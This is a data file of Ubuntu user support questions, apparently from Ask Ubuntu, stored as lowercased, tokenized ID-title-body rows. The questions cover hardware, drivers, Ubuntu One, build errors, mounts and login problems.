56903	space being used without having any file	i just created my ubuntu one account , and i 've been testing it ( uploading and deleting files ) , but i realized that i have 836.0 kb being used without having any file . is this normal ? how can i fix this ? i already checked for hidden files in the ubuntu one folder ( the only one i have syncing ) , but i have none . i also checked in one.ubuntu.com/files but i have the message that says `` letâs get started with syncing your files ! '' which , i think , it means that i have no files .
56906	sound problem while using ubuntu	i could not hear audio.i install ubuntu 10 linux lucid and windows7.i am able to hear audio in windows but no sound in ubuntu . i have no sound card . how could i hear sound ? my computers mother board is gigabyte h55m-s2v .
56907	removing terminal username and path information ?	in the terminal , you are present with the following : < user > @ < machine > : < path > $ how can i modify this so that it only displays the dollar sign , since the rest of that information is easily available .
56910	how to install apt-get if there is no	i 've bought a new netbook with meego preinstalled . surprisingly i did n't find any apt-get there . sudo apt-get : command not found i need to install apt-get somehow 0_o
56913	use user 's icons in a bash script	i am looking for a way to use the icons from the users theme ( in gnome ) in a bash script . the solution could be a environment variable or a file where the path to the users icon set is written . eg . of use : notify-send -- icon= $ myiconpath/status/32/info.svg `` info ''
56915	paste selected text : switch right and middle click	is there a way of choosing between right and middle click for pasting ? there are ways of for disabling it , i want to change the behaviour how do i disable middle mouse button click paste ?
56916	bind folders in .img to folders outside of it ?	is there a way to bind folders located in an .img file to folders outside it ? to be more specific , supposing there 's ubuntu installed in img file , i want the image 's fstab to bind a few folders outside the img file . that is to say the binding must be done from within the image . so if i save anything in one of the binded folders , it will save outside the image without taking up the space assigned to the img .
56917	maximize and undecorate all apps in xubuntu	on my netbook i 'm running xubuntu as it works much faster than unity 2d . i 'd like to have all the apps maximized and undecorated , is there any way to do that without compiz ?
56928	open with dialog offers to me `` iexplore '' . how ?	some days earlier i 've noticed that almost every image i try to open , my ubuntu system tries to open via 'iexplore ' . i do not have wine installed , how this may happen ? i 'm using jupiter ( elementary os ) , it 's based on ubuntu 10.10 .
56929	what is the linux drive naming scheme ?	in windows ; you have the c : \ drive . this is the primary drive upon which windows is installed . however , linux uses a different naming scheme : sda , sdb [ 1-4 ] , etc . can anyone give me a brief outline of it so i might actually understand it instead of being confused by it ?
56933	php upgrades from 5.3.2 to 5.3.6	i am using ubuntu 10.04 . and i want to upgraded my php version . when i am upgrading my php version ( 5.3.2 to 5.3.6 ) but after every updation its show php version 5.3.2.. edit : : i have checked `` ubuntu repository '' , php 5.3.6 is not avalable . : (
56937	babl : recreate aclocal.m4 with macros from libtool 2.4	i am trying to install the development version gimp2.7.2 on my ubuntu 11.04 box.i was following these instructions for the same.i ran into an error at the step where i had to make babl . sudo make make all-recursive make [ 1 ] : entering directory `/home/abc/gimp2.7/gimp-2.7.2/babl' making all in babl make [ 2 ] : entering directory `/home/abc/gimp2.7/gimp-2.7.2/babl/babl' making all in base make [ 3 ] : entering directory `/home/abc/gimp2.7/gimp-2.7.2/babl/babl/base' cc babl-base.lo libtool : version mismatch error . this is libtool 2.4 debian-2.4-2 , but the libtool : definition of this lt_init comes from libtool 2.2.6b . libtool : you should recreate aclocal.m4 with macros from libtool 2.4 debian-2.4-2 libtool : and run autoconf again . make [ 3 ] : *** [ babl-base.lo ] error 63 make [ 3 ] : leaving directory `/home/abc/gimp2.7/gimp-2.7.2/babl/babl/base' make [ 2 ] : *** [ all-recursive ] error 1 make [ 2 ] : leaving directory `/home/abc/gimp2.7/gimp-2.7.2/babl/babl' make [ 1 ] : *** [ all-recursive ] error 1 make [ 1 ] : leaving directory `/home/abc/gimp2.7/gimp-2.7.2/babl' make : *** [ all ] error 2 the error line is libtool : version mismatch error . this is libtool 2.4 debian-2.4-2 , but the libtool : definition of this lt_init comes from libtool 2.2.6b . libtool : you should recreate aclocal.m4 with macros from libtool 2.4 debian-2.4-2 libtool : and run autoconf again . how do i recreate aclocal.m4 with macros from libtool 2.4 ?
56938	getting information on my usb devices	there used to be lots of info on usb devices , coming form /proc/bus/usb/devices . then this was no longer auto mounted , so you had to mount it yourself ( usbdevfs it was called , or something ) now , in 11.04 , even that does n't work . how can i get some info on my device now ?
56943	taskbar + menu does n't show up	i recently formatted my laptop . when booting , it said error : no such partition / grub rescue i tried to install ubuntu netbook , but it gives some errors and the most annoying thing : i ca n't see the taskbar and the top menu ( with ubuntu logo , hour , mail , etc ) . can someone help me with this ? thanks in advance !
56944	how to save output from command ( eg . diff ) into a variable	i want to test if there is any output from the diff ( test if files are same ) , if none echo `` passed $ x '' else echo `` failed $ x '' . i came up with some intermidiate step ( save the output from diff to a file then read from file ) diff `` ./helloworld $ x.out '' `` ./output/helloworld $ x.out '' > tmp.txt ; output= '' `cat tmp.txt` '' ; if [ `` $ output '' = `` '' ] ; then echo `` passed $ x '' ; else echo `` failed $ x '' ; fi ; i 'm sure the code can be improved ? main question is : is it possible to save the output from diff directly into a variable ?
56945	.sh files requires `sh app.sh` even with ` # ! /bin/bash` line	i am under the impression that if i include the line # ! /bin/bash at the start of my file , it will be recognized as a bash script that i can run just by file.sh instead of sh file.sh but in my case , file.sh gives something like test.sh gives test.sh : command not found . why is that ? update i notice i need to use ./ . but i thought it will look in the current directory anyway ? ./test.sh
56952	no keyboard layout in keyboard preferences to match danish macbook	some critical keys ( @ ) are in accessible on my macbook running natty . it 's a 2006 danish keyboard model . is there a way to edit the layout without resorting to terminal ? alternatively where could the right layout be found ? ( it 's not in keyboard prefs . i tried them all ) thanks for the answer below my keyboard looks like this : the danish layout on ubuntu misses the function key . the problem is that i cant get to the 3rd and 4th levels of the other keys .
56956	how do i know when the system recognizes a pc card device ?	i have a bunch of old ethernet pc cards that i am not too sure about ( whether they are any good ) . i want to test them in my laptop to see if they still work ( out of curiosity , and because i want to know if linux supports this hardware ) . how do i know when the card has been recognized ? is there a way to get a notification on card insertion ( notify osd ) ? i can take a bit of coding if necessary ; ) .
56959	is it possible to get an hp media remote to work with ubuntu ?	i have two hp remotes , one is a huge remote for the tv tuner and media centre , and the other is a tiny remote for just controlling a media centre . is it possible to get them to work with ubuntu ( 11.04 ) using lirc ? i know at least one of them is recognized , as i can use one of the buttons to turn the screen off . what would i need for full support ? ( the laptop is a hp dv7 1020us , but the remotes are found in just about all the hp laptops from this period ) .
56960	huawei e160 wireless dongle appears as a drive ?	i have just purchased a huawei e160 dongle on o2 which , i was told works on ubuntu and other linux operating systems however everytime i plug it in it loads as a drive and i can not get to install the software from it ? there is an exe file which will not open so how can i get it to work ? it works on windows perfectly ?
56963	what are the ethics of having a company `` sponsor '' a loco team event ?	i 've got a loco event coming up , and a local company ( that uses and loves ubuntu ) has approached me ( since i 'm the organizer ) with the following proposal : they 'd like to `` sponsor '' the event - bring in coffee ( as well as providing us with a meeting place ) in exchange for a nice little blurb - is that considered `` ok '' to do ? are there guidelines for this sorta thing already ? or do i have to use my gut to make sure it does n't become `` commercial '' ?
56964	how do i decipher diff output	i diff-ed 2 files and got 1c1 < 1 -- - > 1 both files contained just `` 1 '' . how is this different ?
56969	installed babl , but gimp2.7 still says no package 'babl ' found	i asked this question minutes ago . i am trying to install babl for gimp2.7 using this guide however after i sudo make install babl and ./configure gimp , i still get the following error . no package 'babl ' found consider adjusting the pkg_config_path environment variable if you installed software in a non-standard prefix . alternatively , you may set the environment variables babl_cflags and babl_libs to avoid the need to call pkg-config . see the pkg-config man page for more details . i installed babl with the prefix /opt/gimp-2.7 as in the guide on using locate , i get locate babl /usr/lib/babl-0.0 /usr/lib/libbabl-0.0.so.0 /usr/lib/libbabl-0.0.so.0.22.0 /usr/lib/babl-0.0/cie-lab.so /usr/lib/babl-0.0/gegl-fixups.so /usr/lib/babl-0.0/gggl-lies.so /usr/lib/babl-0.0/gggl.so /usr/lib/babl-0.0/gimp-8bit.so /usr/lib/babl-0.0/naive-cmyk.so /usr/lib/babl-0.0/sse-fixups.so /usr/share/doc/libbabl-0.0-0 /usr/share/doc/libbabl-0.0-0/authors /usr/share/doc/libbabl-0.0-0/news.gz /usr/share/doc/libbabl-0.0-0/readme.gz /usr/share/doc/libbabl-0.0-0/todo /usr/share/doc/libbabl-0.0-0/todo.debian /usr/share/doc/libbabl-0.0-0/changelog.debian.gz /usr/share/doc/libbabl-0.0-0/copyright /var/cache/apt/archives/libbabl-0.0-0_0.0.22-1build1_i386.deb /var/lib/dpkg/info/libbabl-0.0-0.list /var/lib/dpkg/info/libbabl-0.0-0.md5sums /var/lib/dpkg/info/libbabl-0.0-0.postinst /var/lib/dpkg/info/libbabl-0.0-0.postrm /var/lib/dpkg/info/libbabl-0.0-0.shlibs my $ path /opt/gimp-2.7/bin : /opt/gimp-2.7/bin : /home/abc/bin : /usr/local/sbin : /usr/local/bin : /usr/sbin : /usr/bin : /sbin : /bin : /usr/games : /opt/real/realplayer : /babl : /usr/lib ( i added the /babl and /usr/lib ) where is the fault ? is babl not installed properly ? if yes , how do i rectify it ? is the path improper ? where should a 'package ' be installed to be findable ?
56972	sssd + encrypted /home , no longer automounts at login	i 've switched a few boxes over to sssd , so they now authenticate against a central ldap server , and cache the credentials when i 'm offline . this works fine , and the ubuntu packages installed fine . but now when i login , my home directory is no longer auto-decrypted/mounted . if i drop out of gdm and login at the console , i 'm presented with this error : keyctl_seach required key not avaliable if i run the suggested command ( ecryptfs-mount-private ) and give that my password , my home directory is unlocked fine . i 'm trying to understand how the login process has changed , such that my password is no longer unlocking the encryption key automatically . i figure it 's a pam issue , so i 've included my /etc/pam.d/common-auth file below . i presume the password is being passed to sssd , then skipping whatever step is usual done to unlock the key . can someone explain how that 's usual done ? auth [ success=3 default=ignore ] pam_sss.so auth [ success=2 default=ignore ] pam_unix.so nullok_secure try_first_pass auth [ success=1 default=ignore ] pam_winbind.so krb5_auth krb5_ccache_type=file cached_login try_first_pass auth requisite pam_deny.so auth required pam_permit.so auth optional pam_ecryptfs.so unwrap update 1 : auth.log is reporting this error when a user logs in : login [ 14202 ] : null passphrase ; aborting a google only turns up this error in the source of pam_ecryptfs.so , and is triggered when the recieved pam_authtok is null : rc = pam_get_item ( pamh , pam_authtok , ( const void ** ) & passphrase ) ; [ ... ] if ( passphrase == null ) { [ ... ] syslog ( log_err , `` null passphrase ; aborting\n '' ) ; [ ... ] } so as least pam_ecryptfs.so is being called ( i.e . it 's not that it 's being skipped because sssd is in place ) . however why is it getting a null passphrase ? update 2 : now i 've learnt more about pam , i 've updated the post with a copy of my common-auth file , since that 's the one being used at login ( not common-password )
56976	how do i prevent firefox from crashing constantly ?	yesterday i bought a new pc . i 've carefully chosen the parts , looking for compatibility . but , after i installed 11.04 , things are really not working as expected . my wireless card ( rtl8185 ) is a pain to connect . i have to take the interface down & up everytime my pc boots . ( but i 'll work on that later ) . and , the worst of all , firefox crashes on almost every page load . i tried to debug it , and it says something related to libfontconfig.so.1 i 've spend the last 12 hours googling around with no solutions . downloading things from terminal ( ie updates ) works just fine . could some drivers ( nvidia , or wifi ) be messing with firefox , causing it to crash ? how can i fix this ? i swear i already googled ! when i run it with gdb : starting program : /usr/lib/firefox-5.0/firefox-bin [ thread debugging using libthread_db enabled ] ... ... program received signal sigsegv , segmentation fauld . 0xb6549942 in ? ? from /usr/lib/i386-linux-gnu/libfontconfig.so.1 full stack trace with gdb i hope anyone can help me here ! thanks ! update-1 disabling pango for firefox with this line on .bashrc did n't work either . export moz_disable_pango=1 update-2 after trying a lot of things , i 've connected a lan cable to my box and now everything works flawlessly . too bad my router is far away from my desk . at least , now i know the problem is not firefox , but my wifi drivers . i 'll post another question regarding my wireless card realtek rtl8185 .
56977	can you install ubuntu on xp and then uninstall xp ? how ?	i have a problem with my pc , you can read about it here if you like answers.yahoo.com anyway , i might go for ubuntu , the thing is i 'm in lebanon and here few , very few people use linux , most of them never heard about ubuntu lol , therefore you 'll be really lucky if you can buy an ubuntu cd or even if you find someone can find someone capable of installing it . so when they fix my pc , they might install xp coz they do n't have a linux operating system , and i hate win 7 and vista so i 'll have to download ubuntu and install it by myself , i do n't want to dual boot coz i do n't have a super computer lol , i have used ubuntu on my vps , never on desktop before so i would like to know if you can download ubuntu , install it , on a xp pro , then remove xp pro ? is there any tutorial ? thank you
56984	there is a crackling sound each time i mute or unmute the sound	sound otherwise is fine but there is a crackling sound when i mute or unmute the sound , also when a video player stops or starts playing a movie , or when any application using sound stops or starts - there is always this annoying crackling sound , how do i fix it ?
56988	installing svn on a local computer	i just tried to install svn on the ubuntu but i 'm getting the following error error : config file dav_svn.conf not properly enabled : /etc/apache2/mods-enabled/dav_svn.conf is a real file , not touching it dpkg : error processing libapache2-svn ( -- configure ) : how can i fix this ?
56993	ubuntu one ca n't connect after installing couchdb	i 've used with ubuntuone on ubuntu 10.04 ( both 32- and 64-bit on different computers ) and it worked very well until one month ago . then i wanted to try to sync my contacts too , so i installed couchdb from backport repository as described in the official guide for ubuntuone ; after that ubuntuone does n't sync or connect anymore . so read a lot of forums and guides and i 've reinstalled ubuntuone client and now the client ca n't connect or login ( even if i clear password from keymanager ) . i 've used the ubuntuone-preferences , u1tools and u1sync ... but nothing . when i enter just the u1tool command in the terminal ( with any option ) , this appears : oops , an error ocurred : traceback ( most recent call last ) : failure : dbus.exceptions.dbusexception : org.freedesktop.dbus.error.spawn.childexited : launch helper exited with unknown return code 1 any ideas ? thanks .
56994	totem becomes unresponsive when i try to turn off subtitles	the video continues to run with no problems but the interface becomes totally unresponsive , clicking or pressing keys does nothing , and when you try to close it several times a dialog pops up saying the program is unresponsive and if you want to 'force quit ' it .
56996	is a discrete graphics card mandatory ?	i have a old intel o4 machine without graphics card . still now i 'm running ubuntu 8.04 i would like to install ubuntu 11.4 version . would that require graphics card support ?
57004	screen flickers in response to < super > p , ca n't bind it to anything	i 'm running ubuntu 11.04 on thinkpad edge 11 '' and no matter what x session or wm i use , p makes widgets blank out for a fraction of a second . after a quick search through gconf and xf86 symbol tables i ca n't find any place where it could be bound . i believe it may have something to do with low-level support for win+p switching video outputs on windows . any suggestions ?
57014	why ca n't upstart start cups or mysql ?	for some reason i ca n't start mysql or cups using upstart i.e . `` service cups start '' results in `` start : job failed to start '' . how can i debug this ? i also tried resintalling using synaptic , but that failed also , since it tries to start process also . this is with 11.04
57016	resize window and content continuously	is it possible to get ubuntu to continuously resize a window and it 's content ? looking in the compizconfig settings manager under re-size window it has the options : normal , outline , rectangle , stretch neither of which do this .
57018	why do my windows turn white ?	i 'm running 11.04 . i walked away from my computer for a few minutes while i had a terminal open . when i came back , the terminal was white . i tried to open chrome , and it 's screen was white too . everything i tried to open was white . even the shutdown menu . what causes this and how can i fix it ?
57025	touchsreen always returns cursor to upper left corner	just installed ubuntu 11.04 on a brand new fujitsu lifebook t901 . the touchscreen seems well-calibrated and recognizes touches , but it always moves the mouse to the upper left corner when clicked . xinput test looks something like this : motion a [ 0 ] =1110 a [ 1 ] =632 a [ 2 ] =0 a [ 3 ] =3 button press 1 motion a [ 0 ] =0 a [ 1 ] =0 a [ 2 ] =0 a [ 3 ] =0 button release 1 ( the mouse always moves back to the origin before it is released ) is there any way to fix this problem ?
57026	ubuntu one files just sync 'd once ever	gon na try to explain my situation , i installed ubuntu one files in my android phone , and it did sync my pictures with no problem at all , i marked it to upload the pics instantly but only on wi-fi so.. no problem so far . the thing is.. it only did the auto-upload this only one time.. i have lots of new pics and none are getting uploaded having the wi-fi on of course . i already tried removing the device and adding it again on ubuntu one config . i tried installing and uninstalling the app back and forth still no luck . i even tried just deleting the .bin file that triggers the `` a new sd card found '' dialog that we get the first time and still no luck do anyone around have a solution for my situation ?
57028	how do i increase the dragable corner size ?	i have found that in 10.10 and 10.04 that the draggable corner for windows ( where it allows you to resize them ) is far too small . is there someway to make it turn into the resize function in a larger area ?
57030	how do you select languages when configuring mailman ?	i have ubuntu 10.04 installed on my vps . i 'm trying to install mailman . the problem i 'm having is that once the installation starts it prompts asking me to select the languages that i 'd like to use , but nothing that i do seems to actually select anything , pressing enter restarts the configuration wizard . how do i fix this ?
57032	how to remove files modified between particular dates ?	as in the topic : i would like to remove files in a directory that have been modified in a particular date range . how can i do this ?
57035	sound notification over ssh	i just switched from the konversation irc client to the terminal based irssi . i 'm starting irssi on a remote machine using gnu screen + ssh . i do not get any sound notification on new messages , which means that i 've to check out irssi once in a while for new messages . that 's not really productive , so i 'm looking for an application / script that plays a sound ( preferably /usr/share/sounds/kde-im-irc-event.ogg and not the annoying beep ) on my machine if there is any activity . it would be great if i can disable the notification for certain channels . or , if that 's not possible , some sort of notification via libnotify , thus making it available to gnome and kde .
57036	how to run application that is located on file system but not installed ?	recently my friend 'installed ' testdisk for me on my laptop and used it to show me some stuff with it . but now i would like to launch it again and i do not know how to do it . i have tried to go ctrl+alt+f1 and then go to testdisk 's directory and try 'sudo testdisk ' but there is no such a command in the system . i have testdisk in /home/monkey ( my user name ) /testdisk-6.12
57037	uninstall enlightenment e16 on ubuntu 10.04	how can i uninstall e16 from ubuntu 10.04 i have gnome and kde installed too , which i want to keep thanks
57039	why is my laptop shutting down when playing the sims 3 ?	whenever i try to play the sims 3 using wine 1.2 in ubuntu natty the acer aspire 4935g is just shutting down without any warning . according to appdb.winehq.org the sims 3 should work almost perfectly fine ( gold status ) on ubuntu and as long as the laptop does not turn off everything does work fine . i also tried different graphics drivers but nvidia current worked best for the geforce 9300m gs . when the laptop is shutting down while i 'm playing the sims 3 i found the following messages ( amongst others ) in jokey.log : 2011-08-14 10:52:28,537 debug : nvidia.available : falling back to default 2011-08-14 10:52:28,745 debug : nvidia_173 is not the alternative in use 2011-08-14 10:52:31,054 debug : nvidia_173 is not the alternative in use 2011-08-14 10:52:31,113 debug : nvidia_173 is not the alternative in use 2011-08-14 10:52:40,779 debug : shutting down i could n't find any errors in kern.log , xorg.0.log or syslog . but maybe i did n't look at the right place ? activating metacity for the time the game is played seems to increase the time i can run the game before the laptop is shutting down . i also noticed that the fans were runing very loud during the whole time the game is played . maybe the laptop is overheating ? how can i check if this is the case ?
57040	what is the difference between 'su - ' , 'sudo bash ' and 'sudo sh ' ?	i would like to know what is the difference between su - sudo bash sudo sh i can not login as root while doing su - because i do not have the root password - i mean i have my user password with which i can sudo `` command '' but this password does not work for su - i can log in as root with sudo bash with my user password and i can login while doing sudo sh but then i get a command prompt in this form #
57043	after deleting files i do not get any more space on my hard drive and files are not in trash	i am deleting files from my filesystem because i am running out of space but i do not get any more free space after deleting them . i can not locate these files and they are not in trash . i do not know if that makes any difference but i have deleted some of these files being logged as root . any ideas ?
57044	error when trying to mount windows share	i am able to view my share if i write the following nautilus smb : //privatenas this open the shares on privatenas ( c , home ) if i try the following nautilus smb : //privatenas/home it opens a login window that asks for domain admin username and password . everything is fine , but what i am trying to do , is mount smb : //privatenas/home to /home/administrator/privatenas i have tried the regular mount command : sudo mount -t smbfs //privatenas/home /home/administrator/privatenas -o uid=1000 but that gives me an error : asks for a password . what am i missing ? what am i doing wrong ? using the following smbclient -l //192.168.0.25 -u administrator that gives me a list of the smb shares . i want to mount one of them . administrator @ optitexfog : ~ $ smbclient -l //privatenas enter administrator 's password : sharename type comment -- -- -- -- - -- -- -- -- -- - ipc $ ipc ipc service ( privatenas ) c disk volume c home disk private user folders administrator disk private user folder server comment -- -- -- -- - -- -- -- - optitexdc privatenas privatenas workgroup master -- -- -- -- - -- -- -- - optitex optitexdc administrator @ optitexfog : ~ $ i thought i had it sorted , but i ca n't see my files . ok , i have a feeling , that this is not a real windows share . the reason i suspect this is that if i browse to \192.168.0.25\ i will not see the home folder . ok , now , my last findings are sad . in order to test my theory , i created a test share on my nas . the mount command worked like a breeze . so , the //privatenas/home is not a real windows share , or at least , not a share i can mount . this does not look correct to me . what should i check ? as mentioned , i have a readynas , netgear 1100 with raidiator 4.1.7
57049	problems with login : unreadable flashing error	i 'm having problems with loggin in on ubuntu 11.04 . i did an install on my laptop after i had windows 7 installed ( dual boot with grub ) . all went well , but when i am about to login on ubuntu it gives a short flashing error . which is unreadable because it flashes . i 'm sure it is n't a wrong password because i can login with ctrl+alt+f1 . does anyone have the same problem or knows a fix for it ? [ edit ] opened file : more /home/teun/.xsesssion-errors could not parse arguments : kan display niet opnemen . ( polkit-gnome-authentication-agent:1371 ) : gtk warning can not open display:0 ( polkit-gnome-authentication-agent:1370 ) : gtk warning can not open display:0 ( nm-applet:1379 ) : gtk warning can not open display:0 also : gnome-session : fatal io error 11 on x server :0 gnome-settings-daemon : fatal io error 104 on x server :0 process:1368 : glib-gobject-critical ** g_object_unref : assertion 'g_is_objecy ( object ) ' failed .
57050	how can i configure airprint to use the photo tray when printing pictures from the ipad	i followed the steps in the answer to a previous question to setup my printer ( hp photosmart c5280 ) to be used from the ipad ( ios 4.2.1 ) , which worked fine on ubuntu 10.04 . apple claims , that for printing photos , an available photo tray would be automatically used . but when i print pictures from the ipad , the main paper tray is used . is there a possibility to change the configuration to make airprint recognize my photo tray ?
57056	ubuntu appears in bios menu ( uefi )	i 've just installed and uninstalled ubuntn and win7 on my laptop for several times , and this happened : see the pictures below . the first one is about bios : the second is what i got after pressed f12 : i do n't know when it appeared for the first time . but , how could this happen ? update=========== @ con-f-use : i 've used a thumb drive named `` install ubuntu '' to install ubuntu , bios version : 53cn14ww . @ cyrex , @ jo-erlend : yeah , it looks really cool ; ) i 'm wondering if this could happen on another laptop @ col : i 've pulled out all the usbs while taking those images . @ james henstridge : i do n't know if it 's a efi bios , how to distinguish ? update=========== is there any test that i can run to figure out if it 's a uefi/efi bios ?
57057	is gnome-do themeable ?	i was wondering if gnome do is themable , besides the 5 pre-installed themes.. i took a look at the projects ' page and did n't discover anything . do you know if there is any chance of unofficial theming or theming plugins ? have anyone tried to change the source code in order to change the theme ?
57059	/sys/kernel/debug/vgaswitcheroo missing	i wanted to install and use asus_switcheroo but unfortunately the vgaswitcheroo folder is missing . i already checked whether vgaswitcheroo is actually enabled and as i use the vanilla kernel it is ( 2.6.38-11-generic ) . [ edit ] after looking a bit further into it it seems to help some people to enable kms on intel and radeon drivers to have the folder . using this ubuntu forum post , add the following entries to the following file : gksudo edit /etc/initramfs-tools/modules then add the following : i915 modeset=1 nouveau modeset=1 close and run following command : sudo update-initramfs -u this lets the folder vgaswitcheroo appear again in debug ( after reboot ) however after installing asus-switcheroo and rebooting that folder will disappear again . with disabling : i915-jprobe nouveau-jprobe which asus-switcheroo adds to /etc/initramfs-tools/modules the directory reappears again , this solution however does not seem consistant and using this solution did not work either unfortunately however temporarely i could live with running : instead i do this at the moment : at startup cd /home/user/asus-switcheroo make install-ubuntu then doing whatever i want to and at shutdown cd /home/user/asus-switcheroo make uninstall-ubuntu possible solution played a little bit around and it seems that if i remove modeset=1 for nouveau and i915 and install asus-switcheroo it will work however when i echo off it does not bring the power saving i wanted but activating nvidia logging out - > in then activating intel logging out - > in saves more energy than using acpi_call . and the problem with switcheroo disappearing is that it might reappear after a reebot seems rather buggy whether the folder will be available or not .
57063	i got the error `` resource is busy '' while trying to mount my hard drive	while trying to mount my hard drive to copy all the necessary data from my broken drive to this one , i got an error saying : # mount -t ntfs /dev/sda1 /mnt/dominik/ fuse : mount failed : device or resource busy this is my fdisk -l if that helps . # fdisk -l disk /dev/sda : 640.1 gb , 640135028736 bytes 255 heads , 63 sectors/track , 77825 cylinders units = cylinders of 16065 * 512 = 8225280 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x70000000 device boot start end blocks id system /dev/sda1 1 77826 625130496 7 hpfs/ntfs and just to let you know i can see this partition in computer but when i try to access it i get this error
57066	retrieve file of a deleted partition	a hard-drive with four partitions ubuntu swap data free was accidentally formated and then partitioned in the same way with the same partition sizes again . i am looking for a way to retrieve a single file from the data partition . it is a *.odt file with mainly text in a table in it . so far i tried to use photorec and tried to find some keywords of that file with grep but without any success . some files are reproduced but not the one i am looking for . is there a way to grep though the partition to look for some key words ? or are there other tools more suitable to retrieve the data ?
57068	ubuntu one 's iphone music app does not cache songs . how do i configure it ?	i 've been using the new music streaming app in my ipod touch for a couple days now . i synced my music folder with ubuntu one and all my music is appearing in the app . however , after playing several hours of music , the app did not cache any song to play offline . is there a way to set how many songs are cached ? when are the songs cached ?
57071	is there a way to stop the display from turning off ?	i 'm using the latest version of ubuntu 11.10 , and although i 've disabled the lock screen options and checked the power settings , my display turns off after around ten minutes . that would n't be so bad , except it does it when i 'm watching movies and tv shows . is that a bug , or is there some way that i can disable that ?
57074	failed to load ati proprietary graphics in oneiric	i ca n't boot into the graphical interface . if i try to startx in the text mode . it outputs the following messages : x.org x server 1.10.2.902 ( 1.10.3 rc 2 ) release date : 2011-07-01 x protocol version 11 , revision 0 build operating system : linux 2.6.24-29-server i686 ubuntu current operating system : linux host 3.0.0-8-generic-pae # 11-ubuntu smp fri aug 12 22:20:08 utc 2011 i686 kernel command line : boot_image=/boot/vmlinuz-3.0.0-8-generic-pae root=uuid=f7e8be67-a239-439b-90b4-ba4c634da473 ro quiet splash vt.handoff=7 build date : 13 july 2011 12:18:21am xorg-server 2:1.10.2.902-1ubuntu3 ( for technical support please see http : //www.ubuntu.com/support ) current version of pixman : 0.22.2 before reporting problems , check http : //wiki.x.org to make sure that you have the latest version . markers : ( -- ) probed , ( ** ) from config file , ( == ) default setting , ( ++ ) from command line , ( ! ! ) notice , ( ii ) informational , ( ww ) warning , ( ee ) error , ( ni ) not implemented , ( ? ? ) unknown . ( == ) log file : `` /var/log/xorg.0.log '' , time : mon aug 15 01:11:23 2011 ( == ) using system config directory `` /usr/share/x11/xorg.conf.d '' ( ee ) failed to load module `` fglrx '' ( module does not exist , 0 ) ( ii ) [ kms ] kernel modesetting enabled . but i have successfully installed fglrx by `` apt-get install fglrx '' . if i manually insmod fglrx.so , i can see : $ lsmod | grep fglrx fglrx 2553695 0 but the startx still output the same message . any help or suggestion is really appreciated .
57077	how can i create a launcher item for jvisualvm ?	when i create a launcher item for jvisualvm according to the regular procedure described here , it does not behave as expected . instead of just starting the app , it starts the app as a different item ... what 's going on ? ? ? steps to reproduce : download and install oracle jdk 1.7.0 in ~/jdk1.7.0 here create a visualvm.desktop file according to the regular procedure , set the executable to be ~/jdk1.7.0/bin/jvisualvm drag the visualvm.desktop file onto the launcher start the app via the new launcher expected : visualvm starts as a regular app what actually happens : visualvm does start up , but it manifests as a new , different item in the launcher instead of the one i just created this new item has a nice icon , so i try to keep it instead of the old one by checking `` keep in launcher '' , however , when i click on this new item , nothing happens ? ? ? so my question is this : how can i create a well-behaved item in the launcher for jvisualvm ?
57079	xubuntu : make shift+numpad work like windows	ok , i 've used ubuntu with gnome for a while , but now i 'm using xubuntu . in ubuntu , there used to be a keyboard preference which makes the numpad more sane , it was called something like `` make shift+numpad work like windows '' . the problem this options solves is , that when you press numpad 7 , it acts like the `` home '' key , which is all fine , but if you press shift+numpad 7 , it acts like the `` 7 '' key , which is not fine because i 'm on a laptop and the regular `` home '' key requires me to pull of an anatomically insane move . anyways , this option made shift+numpad 7 act like the `` home '' key . i ca n't find that option under xubuntu . how do i set it ? update : gui or command line , does n't matter .
57082	is there a cd ripper compatible with creative zen mx ?	i have a creative zen mx mp3 player , and whenever i rip a cd in banshee media player and then transfer the files over to my player , the metadata seems to not be there , or not displaying ( e.g . no album art , no artist , no track title ; just displays filename . ) i have `` write metadata to files '' ticked in the preferences but it still does n't show up . does anybody know of a cd ripper compatible with it ? i will probably end up buying an android phone and listen to my music on that , but i 'd like to try and find a solution for my player at the moment . also , i 'm a bit of a linux noob , so whilst i can enter commands into the terminal , find lines in files to edit , etc . i might need a bit of help : ) edit : additional information ; files downloaded from amazon mp3 work out of the box , i download them directly through the official client or webiste . edit : tried using asunder ripper to rip cds , it adds details to tracks successfully , but there 's no track numbers , so my zen mx just sorts the tracks alphabetically by default . also , on a track with an é in it appears as mojibake , even though i 'm pretty sure my zen can display `` é '' as it displays track names that have ü and ß in them . could this be to do with them being ripped under linux and not windows ? ok , so here 's the images ; i ripped now 74 as i had n't ripped it on linux yet , and i re-ripped it on windows , just to make sure . when ripped by banshee : when ripped by asunder : when ripped by creative centrale , the official ( albeit , windows only ) client for my mp3 player :
57083	just installed 11.04 , and web browsing is slow/nonexistent . download speeds good	i just installed 11.04 after running win7 with 11.04 for a while with no problems . the internet seemed fine because i was just downloading stuff with software update and things like that , but when i went to use firefox , and them chromium , all i get is 1. a page that says the page i 'm looking for is unavailable , and 2. when i reload , the page sometimes comes in , but in a plain text format , and then it 's super-spotty . i 've been looking here for something that might help me figure it out , but so far no joy . i 'm a newbie , but i ran ifconfig , but do n't know how to interpret it . i do n't know how to figure out what drivers i have or even what type of card i have . i have a dell 1012 netbook . tell me what to do . i 'm having to use a different computer for the internet right now . thanks .
57085	installing clipgrab update	clipgrab released an update , which i am unable to update , i 've downloaded the package but it 's not deb and i 'm having issues after extracting the file , not sure how to install it ! has anyone successfully updated clipgrab 3.1.0.2 using the source code ? i 'm so confused ! http : //clipgrab.de/en # linux ricochet @ ricochet-satellite-l305 : ~ $ cd ~/downloads ricochet @ ricochet-satellite-l305 : ~/downloads $ chmod +x clipgrab-3.1.0.2-1 chmod : can not access clipgrab-3.1.0.2-1 ' : no such file or directory ricochet @ ricochet-satellite-l305 : ~/downloads $ drwx -- x -- x 2 ricochet ricochet 4096 2011-08-05 10:00 clipgrab-3.1.0.2 -rw-r -- r -- 1 ricochet ricochet 148002 2011-08-15 18:14 clipgrab-3.1.0.2.tar.bz2
57086	how can i get colors in tty working correctly ?	i use vim a lot and it occurs to me that most of the time i do n't even really need a gui , since i 'll only use my computer to take notes in vim . the problem is , though , is that colors do n't show up correctly on tty ( i.e . when i press ctrl+alt+f1 , f2 , etc ) . i found a plugin for vim that makes colors work better with terminals that usually work with gvim , and that 's made them work in , say , gnome-terminal , but not in tty . this post seems to suggest that i 'd have to recompile the whole kernel to get this to work . is there an easier way ? can it be done ?
